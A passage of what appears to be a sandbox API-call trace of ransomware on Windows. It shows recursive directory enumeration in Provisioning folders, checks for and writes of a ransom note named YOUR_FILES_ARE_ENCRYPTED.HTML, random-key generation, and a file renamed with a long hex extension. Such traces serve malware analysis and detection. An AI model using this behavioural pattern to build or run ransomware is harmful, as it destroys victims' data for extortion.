Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime" [0110.064] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*" [0110.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed033c1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f419c, dwReserved1=0x6f40e8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.064] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed033c1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f419c, dwReserved1=0x6f40e8, cFileName="..", cAlternateFileName="")) returned 1 [0110.064] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16203b1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa16203b1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x6f419c, dwReserved1=0x6f40e8, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.064] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.064] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.064] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.064] lstrlenW (lpString=".provxml") returned 8 [0110.065] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.065] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed033c1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed033c1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed06e59, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f419c, dwReserved1=0x6f40e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.065] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed033c1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed033c1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed06e59, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f419c, dwReserved1=0x6f40e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.065] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.065] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.065] GetProcessHeap () returned 0x600000 [0110.065] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.065] GetProcessHeap () returned 0x600000 [0110.065] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.065] GetProcessHeap () returned 0x600000 [0110.065] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.066] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1646620, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1646620, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.066] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.066] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml") returned 101 [0110.066] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.066] lstrlenW (lpString=".xml") returned 4 [0110.066] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.066] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.066] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=203) returned 1 [0110.066] CloseHandle (hObject=0x32c) returned 1 [0110.066] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed0d06d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed0d06d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed0f70a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.066] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed0d06d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed0d06d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed0f70a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.066] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.067] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.067] GetProcessHeap () returned 0x600000 [0110.067] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.067] GetProcessHeap () returned 0x600000 [0110.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.067] GetProcessHeap () returned 0x600000 [0110.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.068] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed1357e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed1357e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed16cad, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.068] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed1357e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed1357e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed16cad, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.068] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.068] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.068] GetProcessHeap () returned 0x600000 [0110.068] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.069] GetProcessHeap () returned 0x600000 [0110.069] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.069] GetProcessHeap () returned 0x600000 [0110.069] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.069] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed53cad, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed53cad, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{99b095d8-5959-4820-bea7-7448c8427b4e}", cAlternateFileName="{99B09~1")) returned 1 [0110.069] StrStrIW (lpFirst="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.069] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned 84 [0110.070] GetProcessHeap () returned 0x600000 [0110.070] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.070] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}" [0110.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*" [0110.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed53cad, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed7e84d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.071] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed53cad, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed7e84d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.071] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaed577fd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x8b2, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A", cAlternateFileName="CUSTOM~1.94F")) returned 1 [0110.071] StrStrIW (lpFirst="customizations.xml.94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.071] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A") returned 168 [0110.071] PathFindExtensionW (pszPath="customizations.xml.94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A") returned=".94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A" [0110.071] lstrlenW (lpString=".94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A") returned 65 [0110.071] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c7056c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c7056c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c7056c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.071] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.071] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml") returned 104 [0110.071] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.071] lstrlenW (lpString=".xml") returned 4 [0110.071] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.071] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.071] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.071] CloseHandle (hObject=0x30c) returned 1 [0110.072] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.072] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.072] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned 89 [0110.072] GetProcessHeap () returned 0x600000 [0110.072] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.073] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov" [0110.073] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*" [0110.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed774d1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.073] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed774d1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.073] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.073] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.073] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime") returned 97 [0110.073] GetProcessHeap () returned 0x600000 [0110.073] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.074] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime" [0110.074] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*" [0110.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed6ea96, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f491c, dwReserved1=0x6f4868, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.074] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed6ea96, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f491c, dwReserved1=0x6f4868, cFileName="..", cAlternateFileName="")) returned 1 [0110.074] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c2408e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c2408e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c4a301, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x6f491c, dwReserved1=0x6f4868, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.074] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.074] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.074] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.074] lstrlenW 